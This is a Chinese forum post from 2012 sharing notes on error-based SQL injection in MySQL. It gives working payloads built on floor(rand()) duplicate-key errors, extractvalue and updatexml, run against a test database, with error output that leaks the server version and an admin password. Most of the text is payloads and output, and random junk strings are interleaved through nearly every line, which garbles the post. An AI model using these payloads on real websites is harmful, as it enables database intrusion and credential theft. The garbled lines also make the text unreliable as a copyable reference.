放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。% A) S9 o. z1 e5 p. W p+ t: o
实际测试环境:
! |' f7 _1 W. f- A- D0 p2 Z+ k1 O5 I6 F$ m1 E. c& C
' w0 c& c, ^$ I
mysql> show tables;1 h/ B+ d3 I1 \' t# @1 r
+----------------+
; T% W; E" v: d| Tables_in_test |" g+ K2 e0 z. F+ C
+----------------+
2 j- S( T1 g6 ]| admin |5 K9 m3 J) f$ W% u* g1 e! z
| article |' j& M, t' F! b3 u* g
+----------------+
+ x5 g* j, [7 g; J ) S: Y, o s& T) I- @% c
9 i, ]4 ^+ N6 c4 }1 Y8 D7 |0 S% a
7 m9 A3 H% A+ Y, L- _3 z% dmysql> describe admin;
( e1 s8 h3 o. a% o) A# p/ N+-------+------------------+------+-----+---------+----------------+; l( B; M" `8 j' p
| Field | Type | Null | Key | Default | Extra |8 l4 P; A7 G C% l* ^5 U9 `
+-------+------------------+------+-----+---------+----------------+
+ R- Q" `% d+ t8 W; Z) h| id | int(10) unsigned | NO | PRI | NULL | auto_increment |5 w3 J" {& O! b, R+ U
| user | varchar(50) | NO | | NULL | |
6 m( ?: m% {4 s) F| pass | varchar(50) | NO | | NULL | |
% W- @8 H9 ^/ D6 a7 w- `+-------+------------------+------+-----+---------+----------------+) [2 T2 x1 a; f0 Z/ g
3 Y) T. V" Q e. d - c$ }+ y( u0 r' P. C1 Q
1 t8 O' l. V C @* T- }
mysql> describe article;% W0 F1 [: q. t6 [3 a% M1 R
+---------+------------------+------+-----+---------+----------------+
. ~4 Y7 j2 g9 G8 i K! L8 ]; }) t6 f| Field | Type | Null | Key | Default | Extra |
: Y% i4 t* m: l3 q2 R+---------+------------------+------+-----+---------+----------------+
( p2 ^0 k$ s9 d+ p$ R| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
2 j/ [) H6 r+ t" W| title | varchar(50) | NO | | NULL | |# b3 r: I/ z0 F, E _! l
| content | varchar(50) | NO | | NULL | |& t' w6 h. \' f8 f7 u9 O3 B" g
+---------+------------------+------+-----+---------+----------------+9 C* K P: Y- @' B+ z
1、通过floor报错8 L) H2 F1 U( |( `
可以通过如下一些利用代码" ?. ~/ q1 m1 B! Y( V; D: j' d
5 s" m% U! ]2 @0 K7 |0 w; v# d
6 a c3 r. g: Y" D6 q, v
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
: k' [% E0 H% B: `$ f; m2 G ffrom information_schema.tables group by x)a);1 B7 j d4 e" L0 }2 E& O) u
3 A* x1 w( \% h/ k# q
) [ f5 Y& b1 _! Uand (select count(*) from (select 1 union select null union select !1)x; [: D4 d) d2 i- K% N
group by concat((select table_name from information_schema.tables limit 1),
" ]% Z& ~! P8 b9 k4 Y% g* ^floor(rand(0)*2)));5 _6 \" D3 U0 p2 c8 J- |
举例如下:1 j7 g8 L" e4 k( ^; v8 y! U, R2 ~
首先进行正常查询:
7 A2 M6 P( [( C! h 5 N2 i: P7 I: M8 d8 N. y
mysql> select * from article where id = 1;
) P! I4 ?$ b" `- }7 y, _+----+-------+---------+. G7 q2 X7 `$ B9 P$ T
| id | title | content |) l) f" X6 W+ `& Q& ~- D* K
+----+-------+---------+6 M& q* W4 F. R; I! ] N# |
| 1 | test | do it |2 a" I, A/ g7 W9 h" d( i
+----+-------+---------+
. P" a) o/ x# h假如id输入存在注入的话,可以通过如下语句进行报错。$ I- Y) Q# E3 Z6 c1 }
# q3 [* E7 W6 ?7 h $ D1 V3 {. _% k: ~- J
mysql> select * from article where id = 1 and (select 1 from
$ c3 c$ h2 X! d. T j) G(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);; M G) t+ h# F3 m0 n+ W
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
7 a3 ?" E8 W T7 I可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。8 Y- F8 w& l2 i% A- C$ o( d
例如我们需要查询管理员用户名和密码:
% @2 K; H6 i! R* f! ^Method1:
* V. W9 ~7 M1 M $ n4 i( i2 l7 p& c5 J
! S4 E. a+ S/ l! e( r0 kmysql> select * from article where id = 1 and (select 1 from
0 T1 R" u( n' T! Z8 {(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
# w+ k# ~- A0 `9 d8 ufrom information_schema.tables group by x)a);
+ P. {* b5 a7 j7 ^7 @ gERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 _& N& y: ] SMethod2:
/ b' P% j0 N! V, O q! o4 ]
8 n5 F- Z$ E% P, [5 T . D5 A7 n) Q6 I9 `& g" i
mysql> select * from article where id = 1 and (select count(*); C# H4 K0 ^& x3 ^
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
9 F' o) L( h' b9 W" X- \floor(rand(0)*2)));' K8 ]2 G8 i" M# }
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
& Y5 }+ [( ~7 Q ^+ L! g$ T2、ExtractValue
& m/ q$ [6 X! U7 Y$ s4 l O4 Q测试语句如下
/ R; Y9 G: Q8 z* n% h P$ q. l* T0 J6 d4 F/ s
1 r, S& r% @9 U, k' E' X, Oand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
5 E3 S3 ? e0 f3 k/ U# D实际测试过程# |% t0 a; f8 m/ x
7 I9 e. D. M, K3 L0 l! }& ?
" ]( _7 o. }& q" u* ?: ?mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
n0 L* ?: ~, I3 T" S+ T( [(select pass from admin limit 1)));--
* ]1 M- B& _/ z1 R6 IERROR 1105 (HY000): XPATH syntax error: '\admin888'6 ^1 B+ @/ D" I! \: x! J- t
3、UpdateXml, y* f, ]* i' m( Z) u
测试语句
) H. O9 d4 `- Y+ a% I) P6 k, X
7 W4 r: {6 l$ N( T s
4 c0 U& g6 J7 C( n- {' I" o* Vand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))3 r# f4 N- }( Y) y9 a' D/ t
实际测试过程
6 P! T2 \/ ] _9 j5 n* E
" S6 m& }, v- C6 I3 N
8 Q. |/ h' t( b/ i4 y6 amysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,- d0 b h$ Q# A4 Z; f, B" t
(select pass from admin limit 1),0x5e24),1));- j- _3 m( V# K; f6 {
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
' j( [, r% T/ z7 Y: d. nAll, thanks foreign guys.0 [9 _! K. q/ H; L& g, ?" W9 c
% w! ^2 l. |* F
% O) U/ S. P8 ^1 x9 ~ Q |
发表于 2012-12-10 10:28:51
收藏
支持
反对